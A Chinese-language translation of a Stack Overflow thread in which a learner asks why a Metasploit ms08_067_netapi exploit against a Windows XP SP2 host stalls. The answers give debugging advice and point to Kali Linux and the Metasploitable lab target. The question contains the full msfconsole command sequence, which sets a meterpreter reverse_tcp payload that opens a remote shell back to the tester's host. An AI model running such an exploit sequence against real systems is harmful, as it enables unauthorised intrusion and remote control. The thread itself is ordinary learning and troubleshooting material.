我正在学习Metasploit框架,从Armitage开始,以便对结构等有一个大致的了解。我试图黑进一个旧的Windowx sp2,当我试图运行漏洞时,我得到了这样的信息
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.18.130
LHOST => 192.168.18.130
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set LPORT 13592
LPORT => 13592
msf exploit(ms08_067_netapi) > set RHOST 10.0.0.11
RHOST => 10.0.0.11
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.18.130:13592
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...我没有得到任何错误,但它在那里停滞,并且不执行利用。
发布于 2013-12-18 13:58:46
因此,看起来漏洞攻击不适用于您已有的Windows版本。也许你可以试试另一个,简单一点的。这些漏洞是什么时候创建的?您是否完全确定在您的Windows版本中它们未打补丁?
如果您想要从运行其他人编写的利用漏洞脚本中学到任何东西,您必须开始调试并尝试了解脚本正在做什么。在脚本显示Attempting to trigger the vulnerability之后,找出它到底在做什么,并尝试找出它可能无法工作的原因。这里有太多的可能性无法推测。
发布于 2013-12-20 00:49:45
我写了阿米蒂奇。以下是一些需要牢记的事情:
。在BackTrack Linux上不再支持Armitage。Metasploit框架在2013年4月经历了一次重大的依赖关系转变,打破了BackTrack Linux环境。考虑迁移到Kali Linux。这是BackTrack Linux的后续版本。
谷歌为Kali Linux我没有“声誉”点给你两个以上的链接
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/
http://blog.strategiccyber.com/2013/02/06/getting-started-with-armitage-and-the-metasploit-framework-2013/
https://stackoverflow.com/questions/20650402
复制相似问题